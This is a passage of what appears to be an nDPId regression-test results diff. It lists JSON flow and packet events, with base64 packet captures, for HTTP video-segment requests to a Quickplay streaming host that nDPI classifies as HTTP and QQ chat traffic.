-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\/AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTIudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"thread_ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000210215,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYhUEAAPwbJTQo2qfp4HCMoyzIAUDz1ErzkiN8oUBhgH586AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTMudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\/CFv73vENUBgByQDsAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTUudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 01271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"thread_ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="} 01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\/Chn76vrvUBhgH5XpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 02077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"thread_ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVmnnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7iAokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000375190,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYAQEAAPwbqXQo2qfp4HCMoyzYAUPnxUPbwb7kUUBgByReCAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZW